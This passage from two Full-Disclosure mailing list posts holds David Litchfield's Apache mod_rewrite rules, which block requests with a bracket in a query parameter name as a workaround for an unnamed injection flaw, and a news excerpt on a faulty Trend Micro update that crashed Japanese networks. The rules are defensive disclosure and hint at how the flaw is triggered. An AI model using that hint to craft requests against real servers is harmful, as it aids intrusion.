%{QUERY_STRING} ^.*\).*=|.*%29.*=$ RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack we can prevent exploitation if the query string parameter name has a bracket whilst still allowing brackets it the paramter value. This can be tidied up to read RewriteEngine on RewriteCond %{QUERY_STRING} \).*=|%29.*= RewriteRule .? http://127.0.0.1/denied.htm?attempted-attack RewriteRule \)|%29 http://127.0.0.1/denied.htm?attempted-attack # Thanks, Mike Pomraning! For those that haven't been able to adopt the workaround because it would break their specific application, then the modified workaround should work in your situation. Cheers, David Litchfield ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More about the impact of the Trend sigs
http://www.asahi.com/english/Herald-asahi/TKY200504260127.html From the Asahi Shimbun: Trend Micro antivirus fix wasn't tested before release 04/26/2005 The Asahi Shimbun An antivirus software program update that caused widespread computer problems over the weekend was not thoroughly tested prior to its release, maker Trend Micro Inc. admitted Sunday. A bug in the Virus Buster software caused computer operations to loop, causing affected machines to slow down or crash. The glitch paralyzed rail, media and other online networks for hours in Japan on Saturday. After tens of thousands of computers downloaded and installed the upgrade, their operating systems began experiencing the problems. [...] TS ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/